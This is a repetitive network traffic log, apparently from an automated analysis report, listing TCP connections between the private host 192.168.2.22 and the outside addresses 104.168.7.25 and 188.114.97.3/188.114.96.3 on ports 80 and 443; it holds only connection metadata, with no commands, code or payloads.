Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
